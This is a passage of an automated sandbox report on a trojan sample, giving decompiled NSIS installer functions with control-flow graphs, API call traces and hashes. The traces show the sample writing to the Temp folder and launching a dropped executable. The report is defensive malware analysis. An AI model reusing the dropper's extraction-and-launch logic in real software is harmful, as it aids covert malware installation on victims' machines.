                                                                                              • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                              • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                                                              C-Code - Quality: 96%
                                                                                              			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                              0x00403d1d
                                                                                              0x00403d26
                                                                                              0x00403d2d
                                                                                              0x00403d2f
                                                                                              0x00403d43
                                                                                              0x00403d55
                                                                                              0x00403d5e
                                                                                              0x00403d67
                                                                                              0x00403d6e
                                                                                              0x00403d73
                                                                                              0x00403d7a
                                                                                              0x00403d8d
                                                                                              0x00403d8d
                                                                                              0x00403d98
                                                                                              0x00403d31
                                                                                              0x00403d3c
                                                                                              0x00403d3c
                                                                                              0x00403d9d
                                                                                              0x00403da7
                                                                                              0x00403db0
                                                                                              0x00403db5
                                                                                              0x00403dc6
                                                                                              0x00403e58
                                                                                              0x00403e60
                                                                                              0x00403e69
                                                                                              0x00403e69
                                                                                              0x00403e7f
                                                                                              0x00403e85
                                                                                              0x00403e93
                                                                                              0x00403f14
                                                                                              0x00403f1c
                                                                                              0x00403f26
                                                                                              0x00403f2b
                                                                                              0x00403f31
                                                                                              0x00403fbb
                                                                                              0x00403fc0
                                                                                              0x00403fc2
                                                                                              0x00403fde
                                                                                              0x00000000
                                                                                              0x00403fde
                                                                                              0x00403fc4
                                                                                              0x00403fca
                                                                                              0x00403fd2
                                                                                              0x00403fd2
                                                                                              0x00000000
                                                                                              0x00403fca
                                                                                              0x00403f3f
                                                                                              0x00403f4a
                                                                                              0x00403f4f
                                                                                              0x00403f51
                                                                                              0x00403f58
                                                                                              0x00403f58
                                                                                              0x00403f63
                                                                                              0x00403f6b
                                                                                              0x00403f6d
                                                                                              0x00403f6f
                                                                                              0x00403f78
                                                                                              0x00403f7b
                                                                                              0x00403f81
                                                                                              0x00403f81
                                                                                              0x00403fa0
                                                                                              0x00403fb1
                                                                                              0x00000000
                                                                                              0x00403fb6
                                                                                              0x00403f1e
                                                                                              0x00403f20
                                                                                              0x00000000
                                                                                              0x00403e95
                                                                                              0x00403e95
                                                                                              0x00403ea1
                                                                                              0x00403eab
                                                                                              0x00403eb1
                                                                                              0x00403eb6
                                                                                              0x00403ec5
                                                                                              0x00403fe3
                                                                                              0x00403fe3
                                                                                              0x00000000
                                                                                              0x00403fe3
                                                                                              0x00403ed4
                                                                                              0x00403f0f
                                                                                              0x00000000
                                                                                              0x00403f0f
                                                                                              0x00403dcc
                                                                                              0x00403dcc
                                                                                              0x00403dcf
                                                                                              0x00403dd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403ddf
                                                                                              0x00403df1
                                                                                              0x00403df6
                                                                                              0x00403dff
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e05
                                                                                              0x00403e07
                                                                                              0x00403e14
                                                                                              0x00403e14
                                                                                              0x00403e1d
                                                                                              0x00403e23
                                                                                              0x00403e4b
                                                                                              0x00403e53
                                                                                              0x00000000
                                                                                              0x00403e35
                                                                                              0x00403e36
                                                                                              0x00403e3f
                                                                                              0x00403e45
                                                                                              0x00403e46
                                                                                              0x00000000
                                                                                              0x00403e46
                                                                                              0x00403e41
                                                                                              0x00403e43
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403e43
                                                                                              0x00403e23

                                                                                              APIs
                                                                                                • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                                • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                              • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                              • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,?,?,?,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7476FAA0), ref: 00403E18
                                                                                              • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,?,?,?,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                              • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,?,00000000,?), ref: 00403E36
                                                                                              • LoadImageW.USER32 ref: 00403E7F
                                                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                              • RegisterClassW.USER32 ref: 00403EBC
                                                                                              • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                                              • CreateWindowExW.USER32 ref: 00403F09
                                                                                              • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                              • GetClassInfoW.USER32 ref: 00403F6B
                                                                                              • GetClassInfoW.USER32 ref: 00403F78
                                                                                              • RegisterClassW.USER32 ref: 00403F81
                                                                                              • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 1975747703-76231216
                                                                                              • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                              • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                              • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                              • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                                                              C-Code - Quality: 98%
                                                                                              			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				void* _t102;
				void* _t106;
				long _t107;
				long _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x42a26c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe", 0x400);
				_t106 = E00406158(L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe", 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe");
				E00406668(0x439000, E00405F83(L"C:\\Users\\jones\\Desktop"));
				_t54 = GetFileSize(_t106, 0);
				 *0x420f00 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E(1);
					if( *0x42a274 == _t94) {
						goto L32;
					}
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x40ce68);
						E00406187(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x42a274 + 0x1c);
							 *0x420f04 = _t65;
							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							if(_t68 == _v20) {
								 *0x42a270 = _t111;
								 *0x42a278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a27c =  *0x42a27c + 1;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
								} while (_t102 != 0);
								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
								E00406113(0x42a280, _t111 + 4, 0x40);
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x420ef0);
					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
						goto L32;
					} else {
						goto L28;
					}
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						if(E004035E2(0x418ef0, _t107) == 0) {
							E0040302E(1);
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a274 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x418ef0, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42a274 =  *0x420ef0;
							if(_t92 > _t110) {
								goto L32;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t110 = _t92 - 4;
								if(_t107 > _t110) {
									_t107 = _t110;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t110 <  *0x420f00) {
							_v8 = E00406B22(_v8, 0x418ef0, _t107);
						}
						 *0x420ef0 =  *0x420ef0 + _t107;
						_t110 = _t110 - _t107;
					} while (_t110 != 0);
					_t94 = 0;
					goto L24;
				}
			}




























                                                                                              0x004030db
                                                                                              0x004030de
                                                                                              0x004030e1
                                                                                              0x004030fb
                                                                                              0x00403100
                                                                                              0x00403113
                                                                                              0x00403118
                                                                                              0x0040311e
                                                                                              0x00000000
                                                                                              0x00403120
                                                                                              0x00403131
                                                                                              0x00403142
                                                                                              0x00403149
                                                                                              0x00403151
                                                                                              0x00403156
                                                                                              0x00403158
                                                                                              0x00403243
                                                                                              0x00403245
                                                                                              0x00403251
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040325a
                                                                                              0x00403286
                                                                                              0x0040328b
                                                                                              0x00403296
                                                                                              0x00403298
                                                                                              0x004032a9
                                                                                              0x004032c4
                                                                                              0x004032cd
                                                                                              0x004032d2
                                                                                              0x004032f1
                                                                                              0x00403301
                                                                                              0x00403313
                                                                                              0x00403318
                                                                                              0x00403320
                                                                                              0x0040332d
                                                                                              0x00403335
                                                                                              0x0040333a
                                                                                              0x0040333c
                                                                                              0x0040333c
                                                                                              0x00403344
                                                                                              0x00403344
                                                                                              0x00403347
                                                                                              0x00403348
                                                                                              0x00403348
                                                                                              0x0040334b
                                                                                              0x0040334d
                                                                                              0x0040334d
                                                                                              0x00403357
                                                                                              0x00403363
                                                                                              0x00000000
                                                                                              0x00403368
                                                                                              0x00000000
                                                                                              0x00403320
                                                                                              0x00000000
                                                                                              0x004032d4
                                                                                              0x00403262
                                                                                              0x00403274
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040315e
                                                                                              0x00403163
                                                                                              0x00403168
                                                                                              0x0040316c
                                                                                              0x00403173
                                                                                              0x0040317a
                                                                                              0x0040317c
                                                                                              0x0040317c
                                                                                              0x00403187
                                                                                              0x004032e0
                                                                                              0x00403322
                                                                                              0x00000000
                                                                                              0x00403322
                                                                                              0x00403194
                                                                                              0x00403214
                                                                                              0x00403218
                                                                                              0x0040321d
                                                                                              0x00000000
                                                                                              0x00403214
                                                                                              0x0040319d
                                                                                              0x004031a2
                                                                                              0x004031aa
                                                                                              0x004031d0
                                                                                              0x004031df
                                                                                              0x004031e5
                                                                                              0x004031ea
                                                                                              0x004031f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031fa
                                                                                              0x00403202
                                                                                              0x00403205
                                                                                              0x0040320a
                                                                                              0x0040320c
                                                                                              0x0040320c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004031fa
                                                                                              0x0040321e
                                                                                              0x00403224
                                                                                              0x00403230
                                                                                              0x00403230
                                                                                              0x00403233
                                                                                              0x00403239
                                                                                              0x00403239
                                                                                              0x00403241
                                                                                              0x00000000
                                                                                              0x00403241

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004030E4
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,00000400), ref: 00403100
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe,80000000,00000003), ref: 00403149
                                                                                              • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 2803837635-573977168
                                                                                              • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                              • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                              • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                              • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                                                              C-Code - Quality: 77%
                                                                                              			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"\"C:\\";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406133(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056CA(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
